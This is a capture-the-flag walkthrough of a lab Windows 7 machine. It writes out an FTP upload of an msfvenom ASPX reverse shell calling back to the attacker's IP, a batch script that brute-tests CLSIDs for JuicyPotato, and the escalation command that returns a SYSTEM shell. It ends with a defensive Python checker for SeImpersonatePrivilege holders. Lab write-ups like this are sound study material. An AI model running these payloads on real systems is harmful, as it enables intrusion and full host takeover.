Attacker IP (lhost): 172.21.1.1

CyberSec Labs Weak Walkthrough

FTP anonymous login is allowed.

Upload an ASPX reverse shell (shell.aspx) over FTP, then request it from the web server to get a shell:

     msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f aspx > shell.aspx

http://172.31.1.11/shell.aspx

Priv Esc

Running whoami /priv shows that SeImpersonatePrivilege is enabled on our token.

So a JuicyPotato attack might be useful here.

The target is running Windows 7 (that's a good thing here, since JuicyPotato works on it).

Grab the CLSID.list for Windows 7.

Then run testcli.bat, which tries each CLSID from the list with JuicyPotato on the current Windows 7 box and stores the working ones in result.log.

testcli.bat consists of a simple batch script:

——————————————
@echo off
:: Starting port, you can change it
set /a port=1337
SETLOCAL ENABLEDELAYEDEXPANSION
FOR /F %%i IN (CLSID.list) DO (
   echo %%i !port!
   juicypotato.exe -z -l !port! -c %%i >> result.log
   set RET=!ERRORLEVEL!
   REM echo !RET!
   REM if the listener port was refused, move to the next port for the next CLSID
   if "!RET!" == "1" set /a port=port+1
)
——————————————

Checking result.log, we get lots of working CLSIDs.

Cool, so we can use a CLSID that runs as NT AUTHORITY\SYSTEM with JuicyPotato to get a SYSTEM shell.

Now, running JuicyPotato with the generated reverse shell and that NT AUTHORITY\SYSTEM CLSID, we get a SYSTEM shell:

JuicyPotato.exe -l 1337 -p C:\Users\Public\Downloads\shell.exe -t * -c {687e55ca-6621-4c41-b9f1-c0eddc94bb05}

     Note: here shell.exe is a msfvenom-generated reverse shell that connects back to our listener on port 443:

     msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f exe -o shell.exe

On our listener on port 443 we get an NT AUTHORITY\SYSTEM shell.

And now we can grab the silly flags.
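From the defender's side, the whole chain above hinges on the web-server account holding SeImpersonatePrivilege. The following Python example is added here and is not part of the original walkthrough: it parses the [Privilege Rights] section of a local security policy export (secedit /export /cfg policy.inf) and lists every SID granted that privilege beyond the Windows defaults. The INF text is a constructed sample, and the domain SID in it is made up.

```python
# Added example (not from the original walkthrough): list who holds
# SeImpersonatePrivilege on a Windows host, read from the [Privilege Rights]
# section of a local security policy export:  secedit /export /cfg policy.inf
# Real exports are UTF-16 (use open(path, encoding="utf-16")); the text below
# is a CONSTRUCTED sample, and the S-1-5-21-... domain SID is made up.
SAMPLE_INF = """\
[Privilege Rights]
SeChangeNotifyPrivilege = *S-1-1-0,*S-1-5-32-544,*S-1-5-32-545
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-19,*S-1-5-20,*S-1-5-6,*S-1-5-21-1111-2222-3333-1105
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20
[Version]
signature="$CHICAGO$"
"""

# Accounts that hold "Impersonate a client after authentication" by default.
DEFAULT_IMPERSONATE = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
    "S-1-5-6": "NT AUTHORITY\\SERVICE",
}

def parse_privilege_rights(inf_text):
    """Return {privilege_name: [sid, ...]} from the [Privilege Rights] section."""
    rights, section = {}, None
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section != "Privilege Rights":
            continue
        name, _, value = line.partition("=")
        # secedit writes each holder as *<SID>; drop the marker.
        rights[name.strip()] = [s.strip().lstrip("*") for s in value.split(",") if s.strip()]
    return rights

def non_default_impersonators(rights):
    """SIDs granted SeImpersonatePrivilege beyond the Windows defaults.
    Each extra holder (an app pool identity, a service account) is a token a
    JuicyPotato-style escalation can use if code runs under it; review it."""
    holders = rights.get("SeImpersonatePrivilege", [])
    return [sid for sid in holders if sid not in DEFAULT_IMPERSONATE]

if __name__ == "__main__":
    for sid in non_default_impersonators(parse_privilege_rights(SAMPLE_INF)):
        print("non-default SeImpersonatePrivilege holder:", sid)
```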


Author

Sentinal920